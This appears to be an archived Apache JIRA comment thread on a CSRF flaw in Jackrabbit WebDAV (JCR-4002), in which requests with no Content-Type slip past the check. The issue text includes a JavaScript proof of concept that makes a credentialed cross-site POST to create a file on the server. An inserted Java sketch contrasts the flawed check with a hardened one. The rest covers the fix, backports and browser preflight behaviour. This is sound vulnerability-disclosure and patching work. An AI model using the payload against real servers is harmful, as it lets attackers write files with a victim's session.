[jira] [Commented] (JCR-4002) CSRF in Jackrabbit-Webdav using empty content-type

2016-08-31 Thread Julian Reschke (JIRA)

[ 
https://issues.apache.org/jira/browse/JCR-4002?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=15452125#comment-15452125
 ] 

Julian Reschke commented on JCR-4002:
-

Backed out the changes in [r1758597|http://svn.apache.org/r1758597].

> CSRF in Jackrabbit-Webdav using empty content-type
> --
>
> Key: JCR-4002
> URL: https://issues.apache.org/jira/browse/JCR-4002
> Project: Jackrabbit Content Repository
>  Issue Type: Bug
>  Components: jackrabbit-webdav
>Affects Versions: 2.13.1
>Reporter: Dominique Jäggi
>Assignee: Dominique Jäggi
>Priority: Blocker
>  Labels: csrf, security, webdav
> Fix For: 2.13.2
>
> Attachments: 
> JCR_4002__CSRF_in_Jackrabbit_Webdav_using_empty_content_type.patch
>
>
> As per [0] the CSRF content-type check does not include a null request 
> content type. This can be exploited to create a resource via CSRF like so:
> {code}
> <script>
>   function submitRequest()
>   {
>     var xhr = new XMLHttpRequest();
>     xhr.open("POST", "http://localhost:42427/test/csrf.txt", true);
>     xhr.withCredentials = true;
>     var body = "This file has been uploaded via CSRF.=\r\n";
>     var aBody = new Uint8Array(body.length);
>     for (var i = 0; i < aBody.length; i++)
>       aBody[i] = body.charCodeAt(i);
>     // A Blob without a type is sent with no Content-Type header at all,
>     // i.e. the null request content type the check did not reject.
>     xhr.send(new Blob([aBody]));
>   }
> </script>
> {code}
> I will mitigate this particular issue by including a null content type in the 
> list of rejected content types.
> [0] https://github.com/cryptomator/cryptomator/issues/319



--
This message was sent by Atlassian JIRA
(v6.3.4#6332)
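To make the hole described in the issue concrete from the defender's side, here is an added stand-alone Java sketch (not Jackrabbit's own code; the class and method names, the simple-type set and the sample header values are assumptions): the old-style check looks the raw getContentType() value up in a set, so a request with no Content-Type header passes, while the hardened version treats a missing header as a simple type and normalises parameters, case and whitespace before the lookup.

```java
import java.util.Arrays;
import java.util.HashSet;
import java.util.Locale;
import java.util.Set;

/**
 * Model of the JCR-4002 bug class: a CSRF guard that refuses POSTs carrying a
 * Content-Type a browser sends cross-site without a CORS preflight, but looks the
 * raw header value up in a set and so lets a request with no header through.
 * Added example, not the project's own code.
 */
public final class CsrfContentTypeCheck {

    // The CORS "simple" media types: a cross-site POST with one of these (or with
    // no Content-Type at all) reaches the server without a preflight request.
    // HashSet rather than Set.of(): Set.of(...).contains(null) throws.
    private static final Set<String> SIMPLE_TYPES = new HashSet<>(Arrays.asList(
            "application/x-www-form-urlencoded",
            "multipart/form-data",
            "text/plain"));

    /** Old-style check: HttpServletRequest.getContentType() returns null when the
     *  header is absent; null is not in the set, so the request is not rejected. */
    static boolean rejectedByOldCheck(String contentType) {
        return SIMPLE_TYPES.contains(contentType);
    }

    /**
     * Hardened check: a missing or blank Content-Type counts as simple, and the
     * value is reduced to its media type (parameters such as charset dropped,
     * surrounding whitespace trimmed, case folded) before the lookup. Whether a
     * given browser preflights "text/plain " is then irrelevant to the server.
     */
    static boolean rejectedByNewCheck(String contentType) {
        if (contentType == null || contentType.trim().isEmpty()) {
            return true;
        }
        int semi = contentType.indexOf(';');
        String mediaType = (semi >= 0 ? contentType.substring(0, semi) : contentType)
                .trim().toLowerCase(Locale.ROOT);
        return SIMPLE_TYPES.contains(mediaType);
    }

    public static void main(String[] args) {
        // Constructed sample header values; "text/plain " mirrors the whitespace
        // variant discussed in the thread.
        String[] samples = { null, "", "text/plain", "text/plain ",
                "Text/Plain; charset=UTF-8", "application/json" };
        for (String ct : samples) {
            System.out.printf("%-28s old=%-5b new=%b%n",
                    ct == null ? "<no header>" : "\"" + ct + "\"",
                    rejectedByOldCheck(ct), rejectedByNewCheck(ct));
        }
    }
}
```

Run with `java CsrfContentTypeCheck.java`: only the hardened check rejects the absent, empty, whitespace-padded and parameterised variants, while both let application/json through because a browser preflights it.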


[jira] [Commented] (JCR-4002) CSRF in Jackrabbit-Webdav using empty content-type

2016-08-30 Thread Julian Reschke (JIRA)

[ 
https://issues.apache.org/jira/browse/JCR-4002?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=15449010#comment-15449010
 ] 

Julian Reschke commented on JCR-4002:
-

FWIW, the whitespace in the media type properly causes a CORS preflight in 
Firefox.

For Chrome, I opened: 
https://bugs.chromium.org/p/chromium/issues/detail?id=642346

> CSRF in Jackrabbit-Webdav using empty content-type
> --
>
> Key: JCR-4002
> URL: https://issues.apache.org/jira/browse/JCR-4002
> Project: Jackrabbit Content Repository
>  Issue Type: Bug
>  Components: jackrabbit-webdav
>Affects Versions: 2.4.5, 2.6.5, 2.8.2, 2.10.3, 2.12.3, 2.13.1
>Reporter: Dominique Jäggi
>Assignee: Dominique Jäggi
>Priority: Blocker
>  Labels: csrf, security, webdav
> Fix For: 2.13.2
>
> Attachments: 
> JCR_4002__CSRF_in_Jackrabbit_Webdav_using_empty_content_type.patch


[jira] [Commented] (JCR-4002) CSRF in Jackrabbit-Webdav using empty content-type

2016-08-29 Thread Julian Reschke (JIRA)

[ 
https://issues.apache.org/jira/browse/JCR-4002?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=15446053#comment-15446053
 ] 

Julian Reschke commented on JCR-4002:
-

Checking: is the whitespace in the content type intentional? 

> CSRF in Jackrabbit-Webdav using empty content-type
> --
>
> Key: JCR-4002
> URL: https://issues.apache.org/jira/browse/JCR-4002
> Project: Jackrabbit Content Repository
>  Issue Type: Bug
>  Components: jackrabbit-webdav
>Affects Versions: 2.4.5, 2.6.5, 2.8.2, 2.10.3, 2.12.3, 2.13.1
>Reporter: Dominique Jäggi
>Assignee: Dominique Jäggi
>Priority: Blocker
>  Labels: csrf, security, webdav
> Fix For: 2.13.2
>
> Attachments: 
> JCR_4002__CSRF_in_Jackrabbit_Webdav_using_empty_content_type.patch


[jira] [Commented] (JCR-4002) CSRF in Jackrabbit-Webdav using empty content-type

2016-08-29 Thread Julian Reschke (JIRA)

[ 
https://issues.apache.org/jira/browse/JCR-4002?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=15445805#comment-15445805
 ] 

Julian Reschke commented on JCR-4002:
-

As far as I can tell, JcrRemotingServlet would be vulnerable as well; it 
extends from AbstractWebdavServlet, but does support POST.

The same might be true for other code.

> CSRF in Jackrabbit-Webdav using empty content-type
> --
>
> Key: JCR-4002
> URL: https://issues.apache.org/jira/browse/JCR-4002
> Project: Jackrabbit Content Repository
>  Issue Type: Bug
>  Components: jackrabbit-webdav
>Affects Versions: 2.4.5, 2.6.5, 2.8.2, 2.10.3, 2.12.3, 2.13.1
>Reporter: Dominique Jäggi
>Assignee: Dominique Jäggi
>Priority: Blocker
>  Labels: csrf, security, webdav
> Fix For: 2.13.2
>
> Attachments: 
> JCR_4002__CSRF_in_Jackrabbit_Webdav_using_empty_content_type.patch


[jira] [Commented] (JCR-4002) CSRF in Jackrabbit-Webdav using empty content-type

2016-08-29 Thread Julian Reschke (JIRA)

[ 
https://issues.apache.org/jira/browse/JCR-4002?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=15445482#comment-15445482
 ] 

Julian Reschke commented on JCR-4002:
-

[~djaeggi]: as this is security-related, we need to backport to all supported 
branches, right?

> CSRF in Jackrabbit-Webdav using empty content-type
> --
>
> Key: JCR-4002
> URL: https://issues.apache.org/jira/browse/JCR-4002
> Project: Jackrabbit Content Repository
>  Issue Type: Bug
>  Components: jackrabbit-webdav
>Affects Versions: 2.4.5, 2.6.5, 2.8.2, 2.10.3, 2.12.3, 2.13.1
>Reporter: Dominique Jäggi
>Assignee: Dominique Jäggi
>Priority: Blocker
>  Labels: csrf, security, webdav
> Fix For: 2.13.2
>
> Attachments: 
> JCR_4002__CSRF_in_Jackrabbit_Webdav_using_empty_content_type.patch


[jira] [Commented] (JCR-4002) CSRF in Jackrabbit-Webdav using empty content-type

2016-08-29 Thread Julian Reschke (JIRA)

[ 
https://issues.apache.org/jira/browse/JCR-4002?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=15445474#comment-15445474
 ] 

Julian Reschke commented on JCR-4002:
-

trunk: [r1756604|http://svn.apache.org/r1756604] 
[r1756173|http://svn.apache.org/r1756173]


> CSRF in Jackrabbit-Webdav using empty content-type
> --
>
> Key: JCR-4002
> URL: https://issues.apache.org/jira/browse/JCR-4002
> Project: Jackrabbit Content Repository
>  Issue Type: Bug
>  Components: jackrabbit-webdav
>Affects Versions: 2.4.5, 2.6.5, 2.8.2, 2.10.3, 2.12.3, 2.13.1
>Reporter: Dominique Jäggi
>Assignee: Dominique Jäggi
>Priority: Blocker
>  Labels: csrf, security, webdav
> Fix For: 2.13.2
>
> Attachments: 
> JCR_4002__CSRF_in_Jackrabbit_Webdav_using_empty_content_type.patch


[jira] [Commented] (JCR-4002) CSRF in Jackrabbit-Webdav using empty content-type

2016-08-17 Thread Julian Reschke (JIRA)

[ 
https://issues.apache.org/jira/browse/JCR-4002?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=15424812#comment-15424812
 ] 

Julian Reschke commented on JCR-4002:
-

But that means that code extending from this now will have to the CSRF 
protection, right? If this is true, we need (a) to document that and (b) to 
review the existing code that *does* extend it (JSOP?).

> CSRF in Jackrabbit-Webdav using empty content-type
> --
>
> Key: JCR-4002
> URL: https://issues.apache.org/jira/browse/JCR-4002
> Project: Jackrabbit Content Repository
>  Issue Type: Bug
>  Components: jackrabbit-webdav
>Affects Versions: 2.13.1
>Reporter: Dominique Jäggi
>Assignee: Dominique Jäggi
>Priority: Blocker
>  Labels: csrf, security, webdav
> Fix For: 2.13.2
>
> Attachments: 
> JCR_4002__CSRF_in_Jackrabbit_Webdav_using_empty_content_type.patch


[jira] [Commented] (JCR-4002) CSRF in Jackrabbit-Webdav using empty content-type

2016-08-17 Thread JIRA

[ 
https://issues.apache.org/jira/browse/JCR-4002?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=15424706#comment-15424706
 ] 

Dominique Jäggi commented on JCR-4002:
--

The method wasn't removed as such, it just returns 405. It can be overridden.

> CSRF in Jackrabbit-Webdav using empty content-type
> --
>
> Key: JCR-4002
> URL: https://issues.apache.org/jira/browse/JCR-4002
> Project: Jackrabbit Content Repository
>  Issue Type: Bug
>  Components: jackrabbit-webdav
>Affects Versions: 2.13.1
>Reporter: Dominique Jäggi
>Assignee: Dominique Jäggi
>Priority: Blocker
>  Labels: csrf, security, webdav
> Fix For: 2.13.2
>
> Attachments: 
> JCR_4002__CSRF_in_Jackrabbit_Webdav_using_empty_content_type.patch


[jira] [Commented] (JCR-4002) CSRF in Jackrabbit-Webdav using empty content-type

2016-08-17 Thread Julian Reschke (JIRA)

[ 
https://issues.apache.org/jira/browse/JCR-4002?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=15424703#comment-15424703
 ] 

Julian Reschke commented on JCR-4002:
-

Wait - isn't POST support needed in other servlets that extend from this?

> CSRF in Jackrabbit-Webdav using empty content-type
> --
>
> Key: JCR-4002
> URL: https://issues.apache.org/jira/browse/JCR-4002
> Project: Jackrabbit Content Repository
>  Issue Type: Bug
>  Components: jackrabbit-webdav
>Affects Versions: 2.13.1
>Reporter: Dominique Jäggi
>Assignee: Dominique Jäggi
>Priority: Blocker
>  Labels: csrf, security, webdav
> Fix For: 2.13.2
>
> Attachments: 
> JCR_4002__CSRF_in_Jackrabbit_Webdav_using_empty_content_type.patch


[jira] [Commented] (JCR-4002) CSRF in Jackrabbit-Webdav using empty content-type

2016-08-16 Thread angela (JIRA)

[ 
https://issues.apache.org/jira/browse/JCR-4002?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=15422374#comment-15422374
 ] 

angela commented on JCR-4002:
-

Looks good to me.

> CSRF in Jackrabbit-Webdav using empty content-type
> --
>
> Key: JCR-4002
> URL: https://issues.apache.org/jira/browse/JCR-4002
> Project: Jackrabbit Content Repository
>  Issue Type: Bug
>  Components: jackrabbit-webdav
>Affects Versions: 2.13.1
>Reporter: Dominique Jäggi
>Assignee: Dominique Jäggi
>  Labels: csrf, security, webdav
> Fix For: 2.13.2
>
> Attachments: 
> JCR_4002__CSRF_in_Jackrabbit_Webdav_using_empty_content_type.patch